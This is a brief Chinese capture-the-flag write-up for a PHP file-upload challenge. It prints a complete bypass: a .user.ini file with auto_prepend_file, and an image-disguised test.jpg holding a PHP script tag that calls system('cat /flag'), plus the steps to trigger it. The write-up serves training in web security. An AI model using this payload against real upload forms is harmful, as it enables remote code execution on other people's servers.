1、文件上传题
2、先上传.user.ini,抓包,然后放包
.user.ini内容为:
GIF89a
auto_prepend_file=test.jpg
3、接着上传test.jpg,抓包,放包
test.jpg内容:
GIF89a? <script language="php">system('cat /flag');</script>
4、访问网址:uploads/065831472858248584ff4993846d5065/index.php(抓包,看响应)